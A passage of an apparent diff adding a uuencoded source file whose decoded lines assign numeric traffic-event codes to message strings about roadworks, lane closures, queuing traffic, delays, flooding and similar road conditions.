+M;W5L9&5R(&%L;&]W960B.PH@("`@)$5V96YT6S8V,ET@(#T@(FYO<FUA;"!L
+M86YE(')E9W5L871I;VYS(')E<W1O<F5D(CL*("`@("1%=F5N=%LV-C-=("`]
+M(")A;&P@8V%R<FEA9V5W87ES(&-L96%R960B.PH@("`@)$5V96YT6S8W,5T@
+M(#T@(F)U<R!L86YE(&%V86EL86)L92!F;W(@8V%R<&]O;',@*'=I=&@@870@
+M;&5A<W0@42!O8V-U<&%N=',I(CL*("`@("1%=F5N=%LV-S)=("`](")M97-S
+M86=E(&-A;F-E;&QE9"(["B`@("`D179E;G1;-C<S72`@/2`B;65S<V%G92!C
+M86YC96QL960B.PH@("`@)$5V96YT6S8W-ET@(#T@(F)U<R!L86YE(&)L;V-K
+M960B.PH@("`@)$5V96YT6S8W.%T@(#T@(FAE879Y('9E:&EC;&4@;&%N92!C
+M;&]S960B.PH@("`@)$5V96YT6S8W.5T@(#T@(FAE879Y('9E:&EC;&4@;&%N
+M92!B;&]C:V5D(CL*("`@("1%=F5N=%LV.#!=("`](")R96]P96YE9"!F;W(@
+M=&AR;W5G:"!T<F%F9FEC(CL*("`@("1%=F5N=%LW,#%=("`]("(H42!S971S
+M(&]F*2!R;V%D=V]R:W,B.PH@("`@)$5V96YT6S<P,ET@(#T@(BA1('-E=',@
+M;V8I(&UA:F]R(')O861W;W)K<R(["B`@("`D179E;G1;-S`S72`@/2`B*%$@
+M<V5T<R!O9BD@;6%I;G1E;F%N8V4@=V]R:R(["B`@("`D179E;G1;-S`T72`@
+M/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C:6YG('=O<FLB.PH@("`@)$5V
+M96YT6S<P-5T@(#T@(BA1('-E=',@;V8I(&-E;G1R86P@<F5S97)V871I;VX@
+M=V]R:R(["B`@("`D179E;G1;-S`V72`@/2`B*%$@<V5T<R!O9BD@<F]A9"!M
+M87)K:6YG('=O<FLB.PH@("`@)$5V96YT6S<P-UT@(#T@(F)R:61G92!M86EN
+M=&5N86YC92!W;W)K("AA="!1(&)R:61G97,I(CL*("`@("1%=F5N=%LW,#A=
+M("`]("(H42!S971S(&]F*2!T96UP;W)A<GD@=')A9F9I8R!L:6=H=',B.PH@
+M("`@)$5V96YT6S<P.5T@(#T@(BA1('-E8W1I;VYS(&]F*2!B;&%S=&EN9R!W
+M;W)K(CL*("`@("1%=F5N=%LW,3!=("`]("(H42!S971S(&]F*2!R;V%D=V]R
+M:W,N(%-T871I;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;-S$Q72`@/2`B
+M*%$@<V5T<R!O9BD@<F]A9'=O<FMS+B!3=&%T:6]N87)Y('1R869F:6,@9F]R
+M(&MM(CL*("`@("1%=F5N=%LW,3)=("`]("(H42!S971S(&]F*2!R;V%D=V]R
+M:W,N(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S<Q
+M,UT@(#T@(BA1('-E=',@;V8I(')O861W;W)K<RX@4W1A=&EO;F%R>2!T<F%F
+M9FEC(&9O<B!K;2(["B`@("`D179E;G1;-S$T72`@/2`B*%$@<V5T<R!O9BD@
+M<F]A9'=O<FMS+B!3=&%T:6]N87)Y('1R869F:6,@9F]R(&MM(CL*("`@("1%
+M=F5N=%LW,35=("`]("(H42!S971S(&]F*2!R;V%D=V]R:W,N(%-T871I;VYA
+M<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S<Q-ET@(#T@(BA1('-E
+M=',@;V8I(')O861W;W)K<RX@1&%N9V5R(&]F('-T871I;VYA<GD@=')A9F9I
+M8R(["B`@("`D179E;G1;-S$W72`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS
+M+B!1=65U:6YG('1R869F:6,B.PH@("`@)$5V96YT6S<Q.%T@(#T@(BA1('-E
+M=',@;V8I(')O861W;W)K<RX@475E=6EN9R!T<F%F9FEC(&9O<B!K;2(["B`@
+M("`D179E;G1;-S$Y72`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS+B!1=65U
+M:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LW,C!=("`]("(H42!S
+M971S(&]F*2!R;V%D=V]R:W,N(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@
+M("`@)$5V96YT6S<R,5T@(#T@(BA1('-E=',@;V8I(')O861W;W)K<RX@475E
+M=6EN9R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-S(R72`@/2`B*%$@
+M<V5T<R!O9BD@<F]A9'=O<FMS+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*
+M("`@("1%=F5N=%LW,C-=("`]("(H42!S971S(&]F*2!R;V%D=V]R:W,N($1A
+M;F=E<B!O9B!Q=65U:6YG('1R869F:6,B.PH@("`@)$5V96YT6S<R-%T@(#T@
+M(BA1('-E=',@;V8I(')O861W;W)K<RX@4VQO=R!T<F%F9FEC(CL*("`@("1%
+M=F5N=%LW,C5=("`]("(H42!S971S(&]F*2!R;V%D=V]R:W,N(%-L;W<@=')A
+M9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S<R-ET@(#T@(BA1('-E=',@;V8I
+M(')O861W;W)K<RX@4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;
+M-S(W72`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS+B!3;&]W('1R869F:6,@
+M9F]R(&MM(CL*("`@("1%=F5N=%LW,CA=("`]("(H42!S971S(&]F*2!R;V%D
+M=V]R:W,N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S<R.5T@
+M(#T@(BA1('-E=',@;V8I(')O861W;W)K<RX@4VQO=R!T<F%F9FEC(&9O<B!K
+M;2(["B`@("`D179E;G1;-S,P72`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS
+M+B!3;&]W('1R869F:6,@97AP96-T960B.PH@("`@)$5V96YT6S<S,5T@(#T@
+M(BA1('-E=',@;V8I(')O861W;W)K<RX@2&5A=GD@=')A9F9I8R(["B`@("`D
+M179E;G1;-S,R72`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS+B!(96%V>2!T
+M<F%F9FEC(&5X<&5C=&5D(CL*("`@("1%=F5N=%LW,S-=("`]("(H42!S971S
+M(&]F*2!R;V%D=V]R:W,N(%1R869F:6,@9FQO=VEN9R!F<F5E;'DB.PH@("`@
+M)$5V96YT6S<S-%T@(#T@(BA1('-E=',@;V8I(')O861W;W)K<RX@5')A9F9I
+M8R!B=6EL9&EN9R!U<"(["B`@("`D179E;G1;-S,U72`@/2`B8VQO<V5D(&1U
+M92!T;R`H42!S971S(&]F*2!R;V%D=V]R:W,B.PH@("`@)$5V96YT6S<S-ET@
+M(#T@(BA1('-E=',@;V8I(')O861W;W)K<RX@4FEG:'0@;&%N92!C;&]S960B
+M.PH@("`@)$5V96YT6S<S-UT@(#T@(BA1('-E=',@;V8I(')O861W;W)K<RX@
+M0V5N=')E(&QA;F4@8VQO<V5D(CL*("`@("1%=F5N=%LW,SA=("`]("(H42!S
+M971S(&]F*2!R;V%D=V]R:W,N($QE9G0@;&%N92!C;&]S960B.PH@("`@)$5V
+M96YT6S<S.5T@(#T@(BA1('-E=',@;V8I(')O861W;W)K<RX@2&%R9"!S:&]U
+M;&1E<B!C;&]S960B.PH@("`@)$5V96YT6S<T,%T@(#T@(BA1('-E=',@;V8I
+M(')O861W;W)K<RX@5'=O(&QA;F5S(&-L;W-E9"(["B`@("`D179E;G1;-S0Q
+M72`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS+B!4:')E92!L86YE<R!C;&]S
+M960B.PH@("`@)$5V96YT6S<T,ET@(#T@(BA1('-E=',@;V8I(')O861W;W)K
+M<RX@4VEN9VQE(&%L=&5R;F%T92!L:6YE('1R869F:6,B.PH@("`@)$5V96YT
+M6S<T,UT@(#T@(G)O861W;W)K<RX@0V%R<FEA9V5W87D@<F5D=6-E9"`H9G)O
+M;2!1(&QA;F5S*2!T;R!O;F4@;&%N92(["B`@("`D179E;G1;-S0T72`@/2`B
+M<F]A9'=O<FMS+B!#87)R:6%G97=A>2!R961U8V5D("AF<F]M(%$@;&%N97,I
+M('1O('1W;R!L86YE<R(["B`@("`D179E;G1;-S0U72`@/2`B<F]A9'=O<FMS
+M+B!#87)R:6%G97=A>2!R961U8V5D("AF<F]M(%$@;&%N97,I('1O('1H<F5E
+M(&QA;F5S(CL*("`@("1%=F5N=%LW-#9=("`]("(H42!S971S(&]F*2!R;V%D
+M=V]R:W,N($-O;G1R869L;W<B.PH@("`@)$5V96YT6S<T-UT@(#T@(G)O861W
+M;W)K<RX@1&5L87ES("A1*2(["B`@("`D179E;G1;-S0X72`@/2`B<F]A9'=O
+M<FMS+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LW-#E=("`]
+M(")R;V%D=V]R:W,N($QO;F<@9&5L87ES("A1*2(["B`@("`D179E;G1;-S4P
+M72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C:6YG('=O<FLN(%-T871I
+M;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;-S4Q72`@/2`B*%$@<V5C=&EO
+M;G,@;V8I(')E<W5R9F%C:6YG('=O<FLN(%-T871I;VYA<GD@=')A9F9I8R!F
+M;W(@:VTB.PH@("`@)$5V96YT6S<U,ET@(#T@(BA1('-E8W1I;VYS(&]F*2!R
+M97-U<F9A8VEN9R!W;W)K+B!3=&%T:6]N87)Y('1R869F:6,@9F]R(&MM(CL*
+M("`@("1%=F5N=%LW-3-=("`]("(H42!S96-T:6]N<R!O9BD@<F5S=7)F86-I
+M;F<@=V]R:RX@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;-S4T72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C:6YG('=O<FLN
+M(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S<U-5T@
+M(#T@(BA1('-E8W1I;VYS(&]F*2!R97-U<F9A8VEN9R!W;W)K+B!3=&%T:6]N
+M87)Y('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LW-39=("`]("(H42!S
+M96-T:6]N<R!O9BD@<F5S=7)F86-I;F<@=V]R:RX@1&%N9V5R(&]F('-T871I
+M;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;-S4W72`@/2`B*%$@<V5C=&EO
+M;G,@;V8I(')E<W5R9F%C:6YG('=O<FLN(%%U975I;F<@=')A9F9I8R(["B`@
+M("`D179E;G1;-S4X72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C:6YG
+M('=O<FLN(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S<U
+M.5T@(#T@(BA1('-E8W1I;VYS(&]F*2!R97-U<F9A8VEN9R!W;W)K+B!1=65U
+M:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LW-C!=("`]("(H42!S
+M96-T:6]N<R!O9BD@<F5S=7)F86-I;F<@=V]R:RX@475E=6EN9R!T<F%F9FEC
+M(&9O<B!K;2(["B`@("`D179E;G1;-S8Q72`@/2`B*%$@<V5C=&EO;G,@;V8I
+M(')E<W5R9F%C:6YG('=O<FLN(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@
+M("`@)$5V96YT6S<V,ET@(#T@(BA1('-E8W1I;VYS(&]F*2!R97-U<F9A8VEN
+M9R!W;W)K+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LW
+M-C-=("`]("(H42!S96-T:6]N<R!O9BD@<F5S=7)F86-I;F<@=V]R:RX@1&%N
+M9V5R(&]F('%U975I;F<@=')A9F9I8R(["B`@("`D179E;G1;-S8T72`@/2`B
+M*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C:6YG('=O<FLN(%-L;W<@=')A9F9I
+M8R(["B`@("`D179E;G1;-S8U72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R
+M9F%C:6YG('=O<FLN(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT
+M6S<V-ET@(#T@(BA1('-E8W1I;VYS(&]F*2!R97-U<F9A8VEN9R!W;W)K+B!3
+M;&]W('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LW-C==("`]("(H42!S
+M96-T:6]N<R!O9BD@<F5S=7)F86-I;F<@=V]R:RX@4VQO=R!T<F%F9FEC(&9O
+M<B!K;2(["B`@("`D179E;G1;-S8X72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E
+M<W5R9F%C:6YG('=O<FLN(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V
+M96YT6S<V.5T@(#T@(BA1('-E8W1I;VYS(&]F*2!R97-U<F9A8VEN9R!W;W)K
+M+B!3;&]W('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LW-S!=("`]("(H
+M42!S96-T:6]N<R!O9BD@<F5S=7)F86-I;F<@=V]R:RX@4VQO=R!T<F%F9FEC
+M(&5X<&5C=&5D(CL*("`@("1%=F5N=%LW-S%=("`]("(H42!S96-T:6]N<R!O
+M9BD@<F5S=7)F86-I;F<@=V]R:RX@2&5A=GD@=')A9F9I8R(["B`@("`D179E
+M;G1;-S<R72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C:6YG('=O<FLN
+M($AE879Y('1R869F:6,@97AP96-T960B.PH@("`@)$5V96YT6S<W,UT@(#T@
+M(BA1('-E8W1I;VYS(&]F*2!R97-U<F9A8VEN9R!W;W)K+B!4<F%F9FEC(&9L
+M;W=I;F<@9G)E96QY(CL*("`@("1%=F5N=%LW-S1=("`]("(H42!S96-T:6]N
+M<R!O9BD@<F5S=7)F86-I;F<@=V]R:RX@5')A9F9I8R!B=6EL9&EN9R!U<"([
+M"B`@("`D179E;G1;-S<U72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C
+M:6YG('=O<FLN(%-I;F=L92!A;'1E<FYA=&4@;&EN92!T<F%F9FEC(CL*("`@
+M("1%=F5N=%LW-S9=("`](")R97-U<F9A8VEN9R!W;W)K+B!#87)R:6%G97=A
+M>2!R961U8V5D("AF<F]M(%$@;&%N97,I('1O(&]N92!L86YE(CL*("`@("1%
+M=F5N=%LW-S==("`](")R97-U<F9A8VEN9R!W;W)K+B!#87)R:6%G97=A>2!R
+M961U8V5D("AF<F]M(%$@;&%N97,I('1O('1W;R!L86YE<R(["B`@("`D179E
+M;G1;-S<X72`@/2`B<F5S=7)F86-I;F<@=V]R:RX@0V%R<FEA9V5W87D@<F5D
+M=6-E9"`H9G)O;2!1(&QA;F5S*2!T;R!T:')E92!L86YE<R(["B`@("`D179E
+M;G1;-S<Y72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C:6YG('=O<FLN
+M($-O;G1R869L;W<B.PH@("`@)$5V96YT6S<X,%T@(#T@(G)E<W5R9F%C:6YG
+M('=O<FLN($1E;&%Y<R`H42DB.PH@("`@)$5V96YT6S<X,5T@(#T@(G)E<W5R
+M9F%C:6YG('=O<FLN($1E;&%Y<R`H42D@97AP96-T960B.PH@("`@)$5V96YT
+M6S<X,ET@(#T@(G)E<W5R9F%C:6YG('=O<FLN($QO;F<@9&5L87ES("A1*2([
+M"B`@("`D179E;G1;-S@S72`@/2`B*%$@<V5T<R!O9BD@<F]A9"!M87)K:6YG
+M('=O<FLN(%-T871I;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;-S@T72`@
+M/2`B*%$@<V5T<R!O9BD@<F]A9"!M87)K:6YG('=O<FLN($1A;F=E<B!O9B!S
+M=&%T:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT6S<X-5T@(#T@(BA1('-E
+M=',@;V8I(')O860@;6%R:VEN9R!W;W)K+B!1=65U:6YG('1R869F:6,B.PH@
+M("`@)$5V96YT6S<X-ET@(#T@(BA1('-E=',@;V8I(')O860@;6%R:VEN9R!W
+M;W)K+B!$86YG97(@;V8@<75E=6EN9R!T<F%F9FEC(CL*("`@("1%=F5N=%LW
+M.#==("`]("(H42!S971S(&]F*2!R;V%D(&UA<FMI;F<@=V]R:RX@4VQO=R!T
+M<F%F9FEC(CL*("`@("1%=F5N=%LW.#A=("`]("(H42!S971S(&]F*2!R;V%D
+M(&UA<FMI;F<@=V]R:RX@4VQO=R!T<F%F9FEC(&5X<&5C=&5D(CL*("`@("1%
+M=F5N=%LW.#E=("`]("(H42!S971S(&]F*2!R;V%D(&UA<FMI;F<@=V]R:RX@
+M2&5A=GD@=')A9F9I8R(["B`@("`D179E;G1;-SDP72`@/2`B*%$@<V5T<R!O
+M9BD@<F]A9"!M87)K:6YG('=O<FLN($AE879Y('1R869F:6,@97AP96-T960B
+M.PH@("`@)$5V96YT6S<Y,5T@(#T@(BA1('-E=',@;V8I(')O860@;6%R:VEN
+M9R!W;W)K+B!4<F%F9FEC(&9L;W=I;F<@9G)E96QY(CL*("`@("1%=F5N=%LW
+M.3)=("`]("(H42!S971S(&]F*2!R;V%D(&UA<FMI;F<@=V]R:RX@5')A9F9I
+M8R!B=6EL9&EN9R!U<"(["B`@("`D179E;G1;-SDS72`@/2`B*%$@<V5T<R!O
+M9BD@<F]A9"!M87)K:6YG('=O<FLN(%)I9VAT(&QA;F4@8VQO<V5D(CL*("`@
+M("1%=F5N=%LW.31=("`]("(H42!S971S(&]F*2!R;V%D(&UA<FMI;F<@=V]R
+M:RX@0V5N=')E(&QA;F4@8VQO<V5D(CL*("`@("1%=F5N=%LW.35=("`]("(H
+M42!S971S(&]F*2!R;V%D(&UA<FMI;F<@=V]R:RX@3&5F="!L86YE(&-L;W-E
+M9"(["B`@("`D179E;G1;-SDV72`@/2`B*%$@<V5T<R!O9BD@<F]A9"!M87)K
+M:6YG('=O<FLN($AA<F0@<VAO=6QD97(@8VQO<V5D(CL*("`@("1%=F5N=%LW
+M.3==("`]("(H42!S971S(&]F*2!R;V%D(&UA<FMI;F<@=V]R:RX@5'=O(&QA
+M;F5S(&-L;W-E9"(["B`@("`D179E;G1;-SDX72`@/2`B*%$@<V5T<R!O9BD@
+M<F]A9"!M87)K:6YG('=O<FLN(%1H<F5E(&QA;F5S(&-L;W-E9"(["B`@("`D
+M179E;G1;-SDY72`@/2`B8VQO<V5D(&9O<B!B<FED9V4@9&5M;VQI=&EO;B!W
+M;W)K("AA="!1(&)R:61G97,I(CL*("`@("1%=F5N=%LX,#!=("`](")R;V%D
+M=V]R:W,@8VQE87)E9"(["B`@("`D179E;G1;.#`Q72`@/2`B;65S<V%G92!C
+M86YC96QL960B.PH@("`@)$5V96YT6S@P,ET@(#T@(BA1('-E=',@;V8I(&QO
+M;F<M=&5R;2!R;V%D=V]R:W,B.PH@("`@)$5V96YT6S@P,UT@(#T@(BA1('-E
+M=',@;V8I(&-O;G-T<G5C=&EO;B!W;W)K(CL*("`@("1%=F5N=%LX,#1=("`]
+M("(H42!S971S(&]F*2!S;&]W(&UO=FEN9R!M86EN=&5N86YC92!V96AI8VQE
+M<R(["B`@("`D179E;G1;.#`U72`@/2`B8G)I9&=E(&1E;6]L:71I;VX@=V]R
+M:R`H870@42!B<FED9V5S*2(["B`@("`D179E;G1;.#`V72`@/2`B*%$@<V5T
+M<R!O9BD@=V%T97(@;6%I;B!W;W)K(CL*("`@("1%=F5N=%LX,#==("`]("(H
+M42!S971S(&]F*2!G87,@;6%I;B!W;W)K(CL*("`@("1%=F5N=%LX,#A=("`]
+M("(H42!S971S(&]F*2!W;W)K(&]N(&)U<FEE9"!C86)L97,B.PH@("`@)$5V
+M96YT6S@P.5T@(#T@(BA1('-E=',@;V8I('=O<FL@;VX@8G5R:65D('-E<G9I
+M8V5S(CL*("`@("1%=F5N=%LX,3!=("`](")N97<@<F]A9'=O<FMS(&QA>6]U
+M="(["B`@("`D179E;G1;.#$Q72`@/2`B;F5W(')O860@;&%Y;W5T(CL*("`@
+M("1%=F5N=%LX,3)=("`]("(H42!S971S(&]F*2!R;V%D=V]R:W,N(%-T871I
+M;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S@Q,UT@(#T@(BA1
+M('-E=',@;V8I(')O861W;W)K<RX@475E=6EN9R!T<F%F9FEC(&9O<B!K;2([
+M"B`@("`D179E;G1;.#$T72`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS+B!3
+M;&]W('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LX,35=("`]("(H42!S
+M971S(&]F*2!R;V%D=V]R:W,@9'5R:6YG('1H92!D87D@=&EM92(["B`@("`D
+M179E;G1;.#$V72`@/2`B*%$@<V5T<R!O9BD@<F]A9'=O<FMS(&1U<FEN9R!O
+M9F8M<&5A:R!P97)I;V1S(CL*("`@("1%=F5N=%LX,3==("`]("(H42!S971S
+M(&]F*2!R;V%D=V]R:W,@9'5R:6YG('1H92!N:6=H="(["B`@("`D179E;G1;
+M.#$X72`@/2`B*%$@<V5C=&EO;G,@;V8I(')E<W5R9F%C:6YG('=O<FLN(%-T
+M871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S@Q.5T@(#T@
+M(BA1('-E8W1I;VYS(&]F*2!R97-U<F9A8VEN9R!W;W)K+B!1=65U:6YG('1R
+M869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LX,C!=("`]("(H42!S96-T:6]N
+M<R!O9BD@<F5S=7)F86-I;F<@=V]R:RX@4VQO=R!T<F%F9FEC(&9O<B!K;2([
+M"B`@("`D179E;G1;.#(Q72`@/2`B*%$@<V5T<R!O9BD@<F5S=7)F86-I;F<@
+M=V]R:R!D=7)I;F<@=&AE(&1A>2!T:6UE(CL*("`@("1%=F5N=%LX,C)=("`]
+M("(H42!S971S(&]F*2!R97-U<F9A8VEN9R!W;W)K(&1U<FEN9R!O9F8M<&5A
+M:R!P97)I;V1S(CL*("`@("1%=F5N=%LX,C-=("`]("(H42!S971S(&]F*2!R
+M97-U<F9A8VEN9R!W;W)K(&1U<FEN9R!T:&4@;FEG:'0B.PH@("`@)$5V96YT
+M6S@R-%T@(#T@(BA1('-E=',@;V8I(')O860@;6%R:VEN9R!W;W)K+B!$86YG
+M97(B.PH@("`@)$5V96YT6S@R-5T@(#T@(BA1('-E=',@;V8I('-L;W<@;6]V
+M:6YG(&UA:6YT96YA;F-E('9E:&EC;&5S+B!3=&%T:6]N87)Y('1R869F:6,B
+M.PH@("`@)$5V96YT6S@R-ET@(#T@(BA1('-E=',@;V8I('-L;W<@;6]V:6YG
+M(&UA:6YT96YA;F-E('9E:&EC;&5S+B!$86YG97(@;V8@<W1A=&EO;F%R>2!T
+M<F%F9FEC(CL*("`@("1%=F5N=%LX,C==("`]("(H42!S971S(&]F*2!S;&]W
+M(&UO=FEN9R!M86EN=&5N86YC92!V96AI8VQE<RX@475E=6EN9R!T<F%F9FEC
+M(CL*("`@("1%=F5N=%LX,CA=("`]("(H42!S971S(&]F*2!S;&]W(&UO=FEN
+M9R!M86EN=&5N86YC92!V96AI8VQE<RX@1&%N9V5R(&]F('%U975I;F<@=')A
+M9F9I8R(["B`@("`D179E;G1;.#(Y72`@/2`B*%$@<V5T<R!O9BD@<VQO=R!M
+M;W9I;F<@;6%I;G1E;F%N8V4@=F5H:6-L97,N(%-L;W<@=')A9F9I8R(["B`@
+M("`D179E;G1;.#,P72`@/2`B*%$@<V5T<R!O9BD@<VQO=R!M;W9I;F<@;6%I
+M;G1E;F%N8V4@=F5H:6-L97,N(%-L;W<@=')A9F9I8R!E>'!E8W1E9"(["B`@
+M("`D179E;G1;.#,Q72`@/2`B*%$@<V5T<R!O9BD@<VQO=R!M;W9I;F<@;6%I
+M;G1E;F%N8V4@=F5H:6-L97,N($AE879Y('1R869F:6,B.PH@("`@)$5V96YT
+M6S@S,ET@(#T@(BA1('-E=',@;V8I('-L;W<@;6]V:6YG(&UA:6YT96YA;F-E
+M('9E:&EC;&5S+B!(96%V>2!T<F%F9FEC(&5X<&5C=&5D(CL*("`@("1%=F5N
+M=%LX,S-=("`]("(H42!S971S(&]F*2!S;&]W(&UO=FEN9R!M86EN=&5N86YC
+M92!V96AI8VQE<RX@5')A9F9I8R!F;&]W:6YG(&9R965L>2(["B`@("`D179E
+M;G1;.#,T72`@/2`B*%$@<V5T<R!O9BD@<VQO=R!M;W9I;F<@;6%I;G1E;F%N
+M8V4@=F5H:6-L97,N(%1R869F:6,@8G5I;&1I;F<@=7`B.PH@("`@)$5V96YT
+M6S@S-5T@(#T@(BA1('-E=',@;V8I('-L;W<@;6]V:6YG(&UA:6YT96YA;F-E
+M('9E:&EC;&5S+B!2:6=H="!L86YE(&-L;W-E9"(["B`@("`D179E;G1;.#,V
+M72`@/2`B*%$@<V5T<R!O9BD@<VQO=R!M;W9I;F<@;6%I;G1E;F%N8V4@=F5H
+M:6-L97,N($-E;G1R92!L86YE(&-L;W-E9"(["B`@("`D179E;G1;.#,W72`@
+M/2`B*%$@<V5T<R!O9BD@<VQO=R!M;W9I;F<@;6%I;G1E;F%N8V4@=F5H:6-L
+M97,N($QE9G0@;&%N92!C;&]S960B.PH@("`@)$5V96YT6S@S.%T@(#T@(BA1
+M('-E=',@;V8I('-L;W<@;6]V:6YG(&UA:6YT96YA;F-E('9E:&EC;&5S+B!4
+M=V\@;&%N97,@8VQO<V5D(CL*("`@("1%=F5N=%LX,SE=("`]("(H42!S971S
+M(&]F*2!S;&]W(&UO=FEN9R!M86EN=&5N86YC92!V96AI8VQE<RX@5&AR964@
+M;&%N97,@8VQO<V5D(CL*("`@("1%=F5N=%LX-#!=("`](")W871E<B!M86EN
+M('=O<FLN($1E;&%Y<R`H42DB.PH@("`@)$5V96YT6S@T,5T@(#T@(G=A=&5R
+M(&UA:6X@=V]R:RX@1&5L87ES("A1*2!E>'!E8W1E9"(["B`@("`D179E;G1;
+M.#0R72`@/2`B=V%T97(@;6%I;B!W;W)K+B!,;VYG(&1E;&%Y<R`H42DB.PH@
+M("`@)$5V96YT6S@T,UT@(#T@(F=A<R!M86EN('=O<FLN($1E;&%Y<R`H42DB
+M.PH@("`@)$5V96YT6S@T-%T@(#T@(F=A<R!M86EN('=O<FLN($1E;&%Y<R`H
+M42D@97AP96-T960B.PH@("`@)$5V96YT6S@T-5T@(#T@(F=A<R!M86EN('=O
+M<FLN($QO;F<@9&5L87ES("A1*2(["B`@("`D179E;G1;.#0V72`@/2`B=V]R
+M:R!O;B!B=7)I960@8V%B;&5S+B!$96QA>7,@*%$I(CL*("`@("1%=F5N=%LX
+M-#==("`](")W;W)K(&]N(&)U<FEE9"!C86)L97,N($1E;&%Y<R`H42D@97AP
+M96-T960B.PH@("`@)$5V96YT6S@T.%T@(#T@(G=O<FL@;VX@8G5R:65D(&-A
+M8FQE<RX@3&]N9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LX-#E=("`](")W
+M;W)K(&]N(&)U<FEE9"!S97)V:6-E<RX@1&5L87ES("A1*2(["B`@("`D179E
+M;G1;.#4P72`@/2`B=V]R:R!O;B!B=7)I960@<V5R=FEC97,N($1E;&%Y<R`H
+M42D@97AP96-T960B.PH@("`@)$5V96YT6S@U,5T@(#T@(G=O<FL@;VX@8G5R
+M:65D('-E<G9I8V5S+B!,;VYG(&1E;&%Y<R`H42DB.PH@("`@)$5V96YT6S@U
+M,ET@(#T@(F-O;G-T<G5C=&EO;B!T<F%F9FEC(&UE<F=I;F<B.PH@("`@)$5V
+M96YT6S@U,UT@(#T@(G)O861W;W)K(&-L96%R86YC92!I;B!P<F]G<F5S<R([
+M"B`@("`D179E;G1;.#4T72`@/2`B;6%I;G1E;F%N8V4@=V]R:R!C;&5A<F5D
+M(CL*("`@("1%=F5N=%LX-35=("`](")R;V%D(&QA>6]U="!U;F-H86YG960B
+M.PH@("`@)$5V96YT6S@U-ET@(#T@(F-O;G-T<G5C=&EO;B!T<F%F9FEC(&UE
+M<F=I;F<N($1A;F=E<B(["B`@("`D179E;G1;.#DX72`@/2`B;V)S=')U8W1I
+M;VX@=V%R;FEN9R!W:71H9')A=VXB.PH@("`@)$5V96YT6S@Y.5T@(#T@(F-L
+M96%R86YC92!W;W)K(&EN('!R;V=R97-S+"!R;V%D(&9R964@86=A:6XB.PH@
+M("`@)$5V96YT6SDP,%T@(#T@(F9L;V]D:6YG(&5X<&5C=&5D(CL*("`@("1%
+M=F5N=%LY,#%=("`]("(H42D@;V)S=')U8W1I;VXH<RD@;VX@<F]A9'=A>2![
+M<V]M971H:6YG('1H870@9&]E<R!B;&]C:R!T:&4@<F]A9"!O<B!P87)T(&\B
+M.PH@("`@)$5V96YT6SDP,ET@(#T@(BA1*2!O8G-T<G5C=&EO;G,@;VX@=&AE
+M(')O860N($1A;F=E<B(["B`@("`D179E;G1;.3`S72`@/2`B<W!I;&QA9V4@
+M;VX@=&AE(')O860B.PH@("`@)$5V96YT6SDP-%T@(#T@(G-T;W)M(&1A;6%G
+M92(["B`@("`D179E;G1;.3`U72`@/2`B*%$I(&9A;&QE;B!T<F5E<R(["B`@
+M("`D179E;G1;.3`V72`@/2`B*%$I(&9A;&QE;B!T<F5E<RX@1&%N9V5R(CL*
+M("`@("1%=F5N=%LY,#==("`](")F;&]O9&EN9R(["B`@("`D179E;G1;.3`X
+M72`@/2`B9FQO;V1I;F<N($1A;F=E<B(["B`@("`D179E;G1;.3`Y72`@/2`B
+M9FQA<V@@9FQO;V1S(CL*("`@("1%=F5N=%LY,3!=("`](")D86YG97(@;V8@
